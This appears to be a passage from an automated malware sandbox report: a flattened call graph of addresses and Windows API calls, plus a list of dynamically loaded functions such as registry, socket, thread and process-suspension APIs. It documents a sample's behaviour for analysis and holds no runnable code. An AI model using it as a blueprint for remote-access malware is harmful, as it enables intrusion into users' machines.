48100 409e7d 48098->48100 48099 401f09 11 API calls 48101 409eb4 48099->48101 48566 409196 28 API calls 48100->48566 48551 40a144 48101->48551 48104 409e8f 48567 403014 48104->48567 48108 401f13 28 API calls 48109 409ea4 48108->48109 48110 401f09 11 API calls 48109->48110 48110->48111 48111->48099 48113 41b6c1 GetUserNameW 48112->48113 48603 40417e 48113->48603 48118 403014 28 API calls 48119 41b703 48118->48119 48120 401f09 11 API calls 48119->48120 48121 41b70c 48120->48121 48122 401f09 11 API calls 48121->48122 48123 40f25e 48122->48123 48123->47622 48125 41355b RegQueryValueExA RegCloseKey 48124->48125 48126 40f31f 48124->48126 48125->48126 48126->47495 48126->47651 48128 413a7a RegDeleteValueW 48127->48128 48129 40f3cd 48127->48129 48128->48129 48129->47489 48131 40dd96 48130->48131 48132 41353a 3 API calls 48131->48132 48133 40dd9d 48132->48133 48134 40ddbc 48133->48134 48698 401707 48133->48698 48138 414f65 48134->48138 48136 40ddaa 48701 4138b2 RegCreateKeyA 48136->48701 48139 4020df 11 API calls 48138->48139 48140 414f79 48139->48140 48721 41b944 48140->48721 48143 4020df 11 API calls 48144 414f8f 48143->48144 48145 401e65 22 API calls 48144->48145 48146 414f9d 48145->48146 48147 43bb2c _strftime 40 API calls 48146->48147 48148 414faa 48147->48148 48149 414fbc 48148->48149 48150 414faf Sleep 48148->48150 48151 402093 28 API calls 48149->48151 48150->48149 48152 414fcb 48151->48152 48153 401e65 22 API calls 48152->48153 48154 414fd4 48153->48154 48155 4020f6 28 API calls 48154->48155 48156 414fdf 48155->48156 48157 41beac 28 API calls 48156->48157 48158 414fe7 48157->48158 48725 40489e WSAStartup 48158->48725 48160 414ff1 48161 401e65 22 API calls 48160->48161 48162 414ffa 48161->48162 48163 401e65 22 API calls 48162->48163 48189 415079 48162->48189 48164 415013 48163->48164 48165 401e65 22 API calls 48164->48165 48166 415024 48165->48166 48169 401e65 22 API calls 48166->48169 48167 41beac 28 API calls 48167->48189 48168 401e65 22 API calls 48168->48189 48170 415035 48169->48170 48171 401e65 22 API calls 48170->48171 48173 415046 48171->48173 48172 406c59 28 API calls 48172->48189 48175 401e65 22 API calls 48173->48175 48174 401fe2 28 API calls 48174->48189 48176 415057 48175->48176 48177 401e65 22 API calls 48176->48177 48178 415069 48177->48178 48838 40473d 89 API calls 48178->48838 48180 402093 28 API calls 48180->48189 48181 41b580 80 API calls 48181->48189 48183 4151c7 WSAGetLastError 48731 41cb72 48183->48731 48189->48167 48189->48168 48189->48172 48189->48174 48189->48180 48189->48181 48189->48183 48191 40531e 28 API calls 48189->48191 48192 401e8d 11 API calls 48189->48192 48193 402f10 28 API calls 48189->48193 48194 43bb2c _strftime 40 API calls 48189->48194 48196 406383 28 API calls 48189->48196 48197 401fd8 11 API calls 48189->48197 48201 4020f6 28 API calls 48189->48201 48203 4135e1 31 API calls 48189->48203 48207 4153f6 48189->48207 48726 414f24 48189->48726 48742 40482d 48189->48742 48749 404f51 48189->48749 48764 4048c8 connect 48189->48764 48824 404e26 WaitForSingleObject 48189->48824 48839 4052fd 28 API calls 48189->48839 48840 4145f8 51 API calls 48189->48840 48841 409097 28 API calls 48189->48841 48842 441ed1 20 API calls 48189->48842 48843 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 48189->48843 48191->48189 48192->48189 48193->48189 48195 415b0a Sleep 48194->48195 48195->48189 48196->48189 48197->48189 48201->48189 48203->48189 48204 40417e 28 API calls 48204->48207 48207->48189 48207->48204 48208 401e65 22 API calls 48207->48208 48212 41bc1f 28 API calls 48207->48212 48214 41bdaf 28 API calls 48207->48214 48217 406383 28 API calls 48207->48217 48218 402ea1 28 API calls 48207->48218 48219 402f10 28 API calls 48207->48219 48221 401fd8 11 API calls 48207->48221 48222 401f09 11 API calls 48207->48222 48225 402093 28 API calls 48207->48225 48226 41b580 80 API calls 48207->48226 48227 415aac CreateThread 48207->48227 48844 40ddc4 6 API calls 48207->48844 48845 41bcd3 28 API calls 48207->48845 48847 41bb77 GetTickCount 48207->48847 48848 41bb27 30 API calls ___scrt_fastfail 48207->48848 48849 40f90c 29 API calls 48207->48849 48850 402f31 28 API calls 48207->48850 48851 404aa1 61 API calls _Yarn 48207->48851 48852 404c10 113 API calls ___std_exception_copy 48207->48852 48853 40b08c 85 API calls 48207->48853 48209 415474 GetTickCount 48208->48209 48846 41bc1f 28 API calls 48209->48846 48212->48207 48214->48207 48217->48207 48218->48207 48219->48207 48221->48207 48222->48207 48225->48207 48226->48207 48227->48207 48915 41ada8 105 API calls 48227->48915 48228->47407 48229->47415 48230->47419 48233 4020df 11 API calls 48232->48233 48234 406c65 48233->48234 48235 4032a0 28 API calls 48234->48235 48236 406c82 48235->48236 48236->47440 48238 40ebdf 48237->48238 48239 4135ae RegQueryValueExA RegCloseKey 48237->48239 48238->47437 48238->47455 48239->48238 48240->47445 48241->47474 48242->47465 48243->47457 48244->47473 48916 401f86 48245->48916 48248 40dae0 48250 41c048 GetCurrentProcess 48248->48250 48249 40daab 48920 41b645 29 API calls 48249->48920 48254 40dae5 48250->48254 48251 40daa1 48253 40dbd4 GetLongPathNameW 48251->48253 48256 40417e 28 API calls 48253->48256 48257 40dae9 48254->48257 48258 40db3b 48254->48258 48255 40dab4 48259 401f13 28 API calls 48255->48259 48260 40dbe9 48256->48260 48263 40417e 28 API calls 48257->48263 48262 40417e 28 API calls 48258->48262 48264 40dabe 48259->48264 48261 40417e 28 API calls 48260->48261 48265 40dbf8 48261->48265 48266 40db49 48262->48266 48267 40daf7 48263->48267 48269 401f09 11 API calls 48264->48269 48923 40de0c 28 API calls 48265->48923 48272 40417e 28 API calls 48266->48272 48273 40417e 28 API calls 48267->48273 48269->48251 48270 40dc0b 48924 402fa5 28 API calls 48270->48924 48275 40db5f 48272->48275 48276 40db0d 48273->48276 48274 40dc16 48925 402fa5 28 API calls 48274->48925 48922 402fa5 28 API calls 48275->48922 48921 402fa5 28 API calls 48276->48921 48280 40dc20 48283 401f09 11 API calls 48280->48283 48281 40db6a 48284 401f13 28 API calls 48281->48284 48282 40db18 48285 401f13 28 API calls 48282->48285 48286 40dc2a 48283->48286 48287 40db75 48284->48287 48288 40db23 48285->48288 48289 401f09 11 API calls 48286->48289 48290 401f09 11 API calls 48287->48290 48291 401f09 11 API calls 48288->48291 48292 40dc33 48289->48292 48293 40db7e 48290->48293 48294 40db2c 48291->48294 48295 401f09 11 API calls 48292->48295 48296 401f09 11 API calls 48293->48296 48297 401f09 11 API calls 48294->48297 48298 40dc3c 48295->48298 48296->48264 48297->48264 48299 401f09 11 API calls 48298->48299 48300 40dc45 48299->48300 48301 401f09 11 API calls 48300->48301 48302 40dc4e 48301->48302 48302->47531 48303->47542 48304->47565 48305->47524 48306->47557 48309 434563 48307->48309 48308 43bda0 ___std_exception_copy 21 API calls 48308->48309 48309->48308 48310 40f10c 48309->48310 48926 443001 7 API calls 2 library calls 48309->48926 48927 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48309->48927 48928 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48309->48928 48310->47595 48314->47627 48315->47615 48317->47659 48318->47464 48321 41b556 LoadResource LockResource SizeofResource 48320->48321 48322 40f419 48320->48322 48321->48322 48323 43bda0 48322->48323 48328 4461b8 ___crtLCMapStringA 48323->48328 48324 4461f6 48340 44062d 20 API calls _free 48324->48340 48326 4461e1 RtlAllocateHeap 48327 4461f4 48326->48327 48326->48328 48327->47917 48328->48324 48328->48326 48339 443001 7 API calls 2 library calls 48328->48339 48331 4020bf 48330->48331 48341 4023ce 48331->48341 48333 4020ca 48345 40250a 48333->48345 48335 4020d9 48335->47920 48337 4020b7 28 API calls 48336->48337 48338 406e27 48337->48338 48338->47927 48339->48328 48340->48327 48342 402428 48341->48342 48343 4023d8 48341->48343 48342->48333 48343->48342 48352 4027a7 11 API calls std::_Deallocate 48343->48352 48346 40251a 48345->48346 48347 402520 48346->48347 48348 402535 48346->48348 48353 402569 48347->48353 48363 4028e8 28 API calls 48348->48363 48351 402533 48351->48335 48352->48342 48364 402888 48353->48364 48355 40257d 48356 402592 48355->48356 48357 4025a7 48355->48357 48369 402a34 22 API calls 48356->48369 48371 4028e8 28 API calls 48357->48371 48360 40259b 48370 4029da 22 API calls 48360->48370 48362 4025a5 48362->48351 48363->48351 48365 402890 48364->48365 48366 402898 48365->48366 48372 402ca3 22 API calls 48365->48372 48366->48355 48369->48360 48370->48362 48371->48362 48374 4020e7 48373->48374 48375 4023ce 11 API calls 48374->48375 48376 4020f2 48375->48376 48376->47955 48377->47955 48379 41ced2 48378->48379 48380 41cf31 48379->48380 48385 41cee2 48379->48385 48381 41cf4b 48380->48381 48382 41d071 28 API calls 48380->48382 48399 41d1d7 28 API calls 48381->48399 48382->48381 48384 41cf2d 48384->47955 48386 41cf1a 48385->48386 48390 41d071 48385->48390 48398 41d1d7 28 API calls 48386->48398 48389->47944 48392 41d079 48390->48392 48391 41d0ab 48391->48386 48392->48391 48393 41d0af 48392->48393 48396 41d093 48392->48396 48410 402725 22 API calls 48393->48410 48400 41d0e2 48396->48400 48398->48384 48399->48384 48401 41d0ec __EH_prolog 48400->48401 48411 402717 22 API calls 48401->48411 48403 41d0ff 48412 41d1ee 11 API calls 48403->48412 48405 41d125 48406 41d15d 48405->48406 48413 402730 11 API calls 48405->48413 48406->48391 48408 41d144 48414 402712 11 API calls std::_Deallocate 48408->48414 48411->48403 48412->48405 48413->48408 48414->48406 48415->47959 48416->47963 48417->47965 48421 4032aa 48419->48421 48420 4032c9 48420->47975 48421->48420 48423 4028e8 28 API calls 48421->48423 48423->48420 48425 4051fb 48424->48425 48434 405274 48425->48434 48427 405208 48427->47978 48429 402061 48428->48429 48430 4023ce 11 API calls 48429->48430 48431 40207b 48430->48431 48458 40267a 48431->48458 48435 405282 48434->48435 48436 405288 48435->48436 48437 40529e 48435->48437 48445 4025f0 48436->48445 48439 4052f5 48437->48439 48440 4052b6 48437->48440 48455 4028a4 22 API calls 48439->48455 48444 40529c 48440->48444 48454 4028e8 28 API calls 48440->48454 48444->48427 48446 402888 22 API calls 48445->48446 48447 402602 48446->48447 48448 402672 48447->48448 48449 402629 48447->48449 48457 4028a4 22 API calls 48448->48457 48453 40263b 48449->48453 48456 4028e8 28 API calls 48449->48456 48453->48444 48454->48444 48456->48453 48459 40268b 48458->48459 48460 4023ce 11 API calls 48459->48460 48461 40208d 48460->48461 48461->47981 48462->47989 48463->47994 48466 41b362 48465->48466 48467 41c055 GetCurrentProcess 48465->48467 48468 4135e1 RegOpenKeyExA 48466->48468 48467->48466 48469 41360f RegQueryValueExA RegCloseKey 48468->48469 48470 413639 48468->48470 48469->48470 48471 402093 28 API calls 48470->48471 48472 41364e 48471->48472 48472->48005 48473->48013 48475 40b947 48474->48475 48480 402252 48475->48480 48477 40b952 48484 40b967 48477->48484 48479 40b961 48479->48024 48481 4022ac 48480->48481 48482 40225c 48480->48482 48481->48477 48482->48481 48491 402779 11 API calls std::_Deallocate 48482->48491 48485 40b9a1 48484->48485 48486 40b973 48484->48486 48503 4028a4 22 API calls 48485->48503 48492 4027e6 48486->48492 48490 40b97d 48490->48479 48491->48481 48493 4027ef 48492->48493 48494 402851 48493->48494 48495 4027f9 48493->48495 48505 4028a4 22 API calls 48494->48505 48498 402802 48495->48498 48499 402815 48495->48499 48504 402aea 28 API calls __EH_prolog 48498->48504 48501 402813 48499->48501 48502 402252 11 API calls 48499->48502 48501->48490 48502->48501 48504->48501 48506->48027 48508 402347 48507->48508 48509 402252 11 API calls 48508->48509 48510 4023c7 48509->48510 48510->48027 48512 4024f9 48511->48512 48513 40250a 28 API calls 48512->48513 48514 4020b1 48513->48514 48514->47536 48531 43ba8a 48515->48531 48517 43aed0 48518 43a837 _strftime 36 API calls 48517->48518 48523 43aedc 48518->48523 48519 43ae95 48519->48517 48520 43aeaa 48519->48520 48530 43aeaf __wsopen_s 48519->48530 48536 44062d 20 API calls _free 48520->48536 48524 43af0b 48523->48524 48537 43bacf 40 API calls __Tolower 48523->48537 48527 43af77 48524->48527 48538 43ba36 20 API calls 2 library calls 48524->48538 48539 43ba36 20 API calls 2 library calls 48527->48539 48528 43b03e _strftime 48528->48530 48540 44062d 20 API calls _free 48528->48540 48530->48062 48532 43baa2 48531->48532 48533 43ba8f 48531->48533 48532->48519 48541 44062d 20 API calls _free 48533->48541 48535 43ba94 __wsopen_s 48535->48519 48536->48530 48537->48523 48538->48527 48539->48528 48540->48530 48541->48535 48548 401fb0 48542->48548 48544 402f1e 48545 402055 11 API calls 48544->48545 48546 402f2d 48545->48546 48546->48076 48547->48079 48549 4025f0 28 API calls 48548->48549 48550 401fbd 48549->48550 48550->48544 48552 40a162 48551->48552 48553 413584 3 API calls 48552->48553 48554 40a169 48553->48554 48555 40a197 48554->48555 48556 40a17d 48554->48556 48574 409097 28 API calls 48555->48574 48558 40a182 48556->48558 48559 409ed6 48556->48559 48572 409097 28 API calls 48558->48572 48559->47588 48560 40a1a5 48575 40a1b4 86 API calls 48560->48575 48563 40a190 48573 40a268 29 API calls 48563->48573 48565 40a195 48565->48559 48566->48104 48580 403222 48567->48580 48569 403022 48584 403262 48569->48584 48572->48563 48573->48565 48576 40a2ae 163 API calls 48573->48576 48574->48560 48575->48559 48577 40a2a2 86 API calls 48575->48577 48578 40a2c4 48 API calls 48575->48578 48579 40a2b8 128 API calls 48575->48579 48581 40322e 48580->48581 48590 403618 48581->48590 48583 40323b 48583->48569 48585 40326e 48584->48585 48586 402252 11 API calls 48585->48586 48587 403288 48586->48587 48588 402336 11 API calls 48587->48588 48589 403031 48588->48589 48589->48108 48591 403626 48590->48591 48592 403644 48591->48592 48593 40362c 48591->48593 48595 40365c 48592->48595 48596 40369e 48592->48596 48601 4036a6 28 API calls 48593->48601 48599 4027e6 28 API calls 48595->48599 48600 403642 48595->48600 48602 4028a4 22 API calls 48596->48602 48599->48600 48600->48583 48601->48600 48604 404186 48603->48604 48605 402252 11 API calls 48604->48605 48606 404191 48605->48606 48614 4041bc 48606->48614 48609 4042fc 48626 404353 48609->48626 48611 40430a 48612 403262 11 API calls 48611->48612 48613 404319 48612->48613 48613->48118 48615 4041c8 48614->48615 48618 4041d9 48615->48618 48617 40419c 48617->48609 48619 4041e9 48618->48619 48620 404206 48619->48620 48621 4041ef 48619->48621 48622 4027e6 28 API calls 48620->48622 48625 404267 28 API calls 48621->48625 48624 404204 48622->48624 48624->48617 48625->48624 48627 40435f 48626->48627 48630 404371 48627->48630 48629 40436d 48629->48611 48631 40437f 48630->48631 48632 404385 48631->48632 48633 40439e 48631->48633 48696 4034e6 28 API calls 48632->48696 48634 402888 22 API calls 48633->48634 48635 4043a6 48634->48635 48637 404419 48635->48637 48638 4043bf 48635->48638 48697 4028a4 22 API calls 48637->48697 48641 4027e6 28 API calls 48638->48641 48649 40439c 48638->48649 48641->48649 48649->48629 48696->48649 48704 43ab1a 48698->48704 48702 4138f4 48701->48702 48703 4138ca RegSetValueExA RegCloseKey 48701->48703 48702->48134 48703->48702 48707 43aa9b 48704->48707 48706 40170d 48706->48136 48708 43aaaa 48707->48708 48709 43aabe 48707->48709 48720 44062d 20 API calls _free 48708->48720 48711 43aaaf __alldvrm __wsopen_s 48709->48711 48713 4489d7 48709->48713 48711->48706 48714 44854a _free 5 API calls 48713->48714 48715 4489fe 48714->48715 48716 448a16 GetSystemTimeAsFileTime 48715->48716 48717 448a0a 48715->48717 48716->48717 48718 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 48717->48718 48719 448a27 48718->48719 48719->48711 48720->48711 48722 41b98a _Yarn ___scrt_fastfail 48721->48722 48723 402093 28 API calls 48722->48723 48724 414f84 48723->48724 48724->48143 48725->48160 48727 414f33 48726->48727 48728 414f3d getaddrinfo WSASetLastError 48726->48728 48854 414dc1 48727->48854 48728->48189 48732 4020df 11 API calls 48731->48732 48733 41cb86 FormatMessageA 48732->48733 48734 41cba4 48733->48734 48736 41cbb2 48733->48736 48735 402093 28 API calls 48734->48735 48737 41cbb0 48735->48737 48738 41cbbd LocalFree 48736->48738 48740 401fd8 11 API calls 48737->48740 48739 402055 11 API calls 48738->48739 48739->48737 48741 41cbd9 48740->48741 48741->48189 48743 404846 socket 48742->48743 48744 404839 48742->48744 48746 404860 CreateEventW 48743->48746 48747 404842 48743->48747 48893 40489e WSAStartup 48744->48893 48746->48189 48747->48189 48748 40483e 48748->48743 48748->48747 48750 404f65 48749->48750 48751 404fea 48749->48751 48752 404f6e 48750->48752 48753 404fc0 CreateEventA CreateThread 48750->48753 48754 404f7d GetLocalTime 48750->48754 48751->48189 48752->48753 48753->48751 48896 405150 48753->48896 48894 41bc1f 28 API calls 48754->48894 48756 404f91 48895 4052fd 28 API calls 48756->48895 48765 404a1b 48764->48765 48766 4048ee 48764->48766 48767 40497e 48765->48767 48768 404a21 WSAGetLastError 48765->48768 48766->48767 48769 404923 48766->48769 48771 40531e 28 API calls 48766->48771 48767->48189 48768->48767 48770 404a31 48768->48770 48900 420cf1 27 API calls 48769->48900 48772 404932 48770->48772 48773 404a36 48770->48773 48776 40490f 48771->48776 48779 402093 28 API calls 48772->48779 48777 41cb72 30 API calls 48773->48777 48775 40492b 48775->48772 48778 404941 48775->48778 48780 402093 28 API calls 48776->48780 48781 404a40 48777->48781 48788 404950 48778->48788 48789 404987 48778->48789 48782 404a80 48779->48782 48783 40491e 48780->48783 48911 4052fd 28 API calls 48781->48911 48785 402093 28 API calls 48782->48785 48786 41b580 80 API calls 48783->48786 48790 404a8f 48785->48790 48786->48769 48794 402093 28 API calls 48788->48794 48908 421ad1 54 API calls 48789->48908 48795 41b580 80 API calls 48790->48795 48798 40495f 48794->48798 48795->48767 48796 40498f 48799 4049c4 48796->48799 48800 404994 48796->48800 48802 402093 28 API calls 48798->48802 48910 420e97 28 API calls 48799->48910 48803 402093 28 API calls 48800->48803 48805 40496e 48802->48805 48807 4049a3 48803->48807 48808 41b580 80 API calls 48805->48808 48810 402093 28 API calls 48807->48810 48811 404973 48808->48811 48809 4049cc 48812 4049f9 CreateEventW CreateEventW 48809->48812 48814 402093 28 API calls 48809->48814 48813 4049b2 48810->48813 48901 420d31 48811->48901 48812->48767 48816 41b580 80 API calls 48813->48816 48815 4049e2 48814->48815 48818 402093 28 API calls 48815->48818 48819 4049b7 48816->48819 48820 4049f1 48818->48820 48909 421143 52 API calls 48819->48909 48822 41b580 80 API calls 48820->48822 48823 4049f6 48822->48823 48823->48812 48825 404e40 SetEvent CloseHandle 48824->48825 48826 404e57 closesocket 48824->48826 48827 404ed8 48825->48827 48828 404e64 48826->48828 48827->48189 48829 404e73 48828->48829 48830 404e7a 48828->48830 48914 4050e4 84 API calls 48829->48914 48832 404e8c WaitForSingleObject 48830->48832 48833 404ece SetEvent CloseHandle 48830->48833 48834 420d31 3 API calls 48832->48834 48833->48827 48835 404e9b SetEvent WaitForSingleObject 48834->48835 48836 420d31 3 API calls 48835->48836 48837 404eb3 SetEvent CloseHandle CloseHandle 48836->48837 48837->48833 48838->48189 48840->48189 48841->48189 48842->48189 48843->48189 48844->48207 48845->48207 48846->48207 48847->48207 48848->48207 48849->48207 48850->48207 48851->48207 48852->48207 48853->48207 48855 414e03 GetSystemDirectoryA 48854->48855 48872 414f0a 48854->48872 48856 414e1e 48855->48856 48855->48872 48875 441a8e 48856->48875 48858 414e3a 48882 441ae8 48858->48882 48860 414e4a LoadLibraryA 48861 414e7d 48860->48861 48862 414e6c GetProcAddress 48860->48862 48864 441a8e ___std_exception_copy 20 API calls 48861->48864 48868 414ece 48861->48868 48862->48861 48863 414e78 FreeLibrary 48862->48863 48863->48861 48865 414e99 48864->48865 48867 441ae8 20 API calls 48865->48867 48866 414ed4 GetProcAddress 48866->48868 48869 414eef FreeLibrary 48866->48869 48870 414ea9 LoadLibraryA 48867->48870 48868->48866 48871 414eed 48868->48871 48868->48872 48869->48871 48870->48872 48873 414ebd GetProcAddress 48870->48873 48871->48872 48872->48728 48873->48868 48874 414ec9 FreeLibrary 48873->48874 48874->48868 48876 441aa9 48875->48876 48877 441a9b 48875->48877 48889 44062d 20 API calls _free 48876->48889 48877->48876 48880 441ac0 48877->48880 48879 441ab1 __wsopen_s 48879->48858 48880->48879 48890 44062d 20 API calls _free 48880->48890 48883 441b04 48882->48883 48885 441af6 48882->48885 48891 44062d 20 API calls _free 48883->48891 48885->48883 48886 441b2d 48885->48886 48888 441b0c __wsopen_s 48886->48888 48892 44062d 20 API calls _free 48886->48892 48888->48860 48889->48879 48890->48879 48891->48888 48892->48888 48893->48748 48894->48756 48899 40515c 102 API calls 48896->48899 48898 405159 48899->48898 48900->48775 48902 41e7a2 48901->48902 48903 420d39 48901->48903 48904 41e7b0 48902->48904 48912 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48902->48912 48903->48767 48913 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48904->48913 48907 41e7b7 48908->48796 48909->48811 48910->48809 48912->48904 48913->48907 48914->48830 48917 401f8e 48916->48917 48918 402252 11 API calls 48917->48918 48919 401f99 48918->48919 48919->48248 48919->48249 48919->48251 48920->48255 48921->48282 48922->48281 48923->48270 48924->48274 48925->48280 48926->48309 48931 40f7fd 48929->48931 48930 413584 3 API calls 48930->48931 48931->48930 48932 40f8a1 48931->48932 48934 40f891 Sleep 48931->48934 48951 40f82f 48931->48951 48965 409097 28 API calls 48932->48965 48934->48931 48937 41bcef 28 API calls 48937->48951 48938 40f8ac 48939 41bcef 28 API calls 48938->48939 48940 40f8b8 48939->48940 48966 41384f 14 API calls 48940->48966 48943 401f09 11 API calls 48943->48951 48944 40f8cb 48945 401f09 11 API calls 48944->48945 48947 40f8d7 48945->48947 48946 402093 28 API calls 48946->48951 48948 402093 28 API calls 48947->48948 48949 40f8e8 48948->48949 48952 4137aa 14 API calls 48949->48952 48950 4137aa 14 API calls 48950->48951 48951->48934 48951->48937 48951->48943 48951->48946 48951->48950 48962 40d0d1 112 API calls ___scrt_fastfail 48951->48962 48963 409097 28 API calls 48951->48963 48964 41384f 14 API calls 48951->48964 48953 40f8fb 48952->48953 48967 41288b TerminateProcess WaitForSingleObject 48953->48967 48955 40f903 ExitProcess 48968 412829 62 API calls 48956->48968 48963->48951 48964->48951 48965->48938 48966->48944 48967->48955 48969 4458c8 48971 4458d3 48969->48971 48972 4458fc 48971->48972 48973 4458f8 48971->48973 48975 448b04 48971->48975 48982 445920 DeleteCriticalSection 48972->48982 48976 44854a _free 5 API calls 48975->48976 48977 448b2b 48976->48977 48978 448b49 InitializeCriticalSectionAndSpinCount 48977->48978 48979 448b34 48977->48979 48978->48979 48980 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 48979->48980 48981 448b60 48980->48981 48981->48971 48982->48973 48983 40165e 48984 401666 48983->48984 48985 401669 48983->48985 48986 4016a8 48985->48986 48988 401696 48985->48988 48987 43455e new 22 API calls 48986->48987 48989 40169c 48987->48989 48990 43455e new 22 API calls 48988->48990 48990->48989 48991 426cdc 48996 426d59 send 48991->48996 48997 41e04e 48998 41e063 _Yarn ___scrt_fastfail 48997->48998 49010 41e266 48998->49010 49016 432f55 21 API calls ___std_exception_copy 48998->49016 49001 41e277 49004 41e21a 49001->49004 49012 432f55 21 API calls ___std_exception_copy 49001->49012 49003 41e213 ___scrt_fastfail 49003->49004 49017 432f55 21 API calls ___std_exception_copy 49003->49017 49006 41e2b0 ___scrt_fastfail 49006->49004 49013 4335db 49006->49013 49008 41e240 ___scrt_fastfail 49008->49004 49018 432f55 21 API calls ___std_exception_copy 49008->49018 49010->49004 49011 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 49010->49011 49011->49001 49012->49006 49019 4334fa 49013->49019 49015 4335e3 49015->49004 49016->49003 49017->49008 49018->49010 49020 433509 49019->49020 49021 433513 49019->49021 49020->49015 49021->49020 49025 432f55 21 API calls ___std_exception_copy 49021->49025 49023 433534 49023->49020 49026 4338c8 CryptAcquireContextA 49023->49026 49025->49023 49027 4338e9 CryptGenRandom 49026->49027 49028 4338e4 49026->49028 49027->49028 49029 4338fe CryptReleaseContext 49027->49029 49028->49020 49029->49028 49030 426c6d 49036 426d42 recv 49030->49036

                                                                                              Executed Functions

                                                                                              Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                              • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                              • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                              • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                              • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                              • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
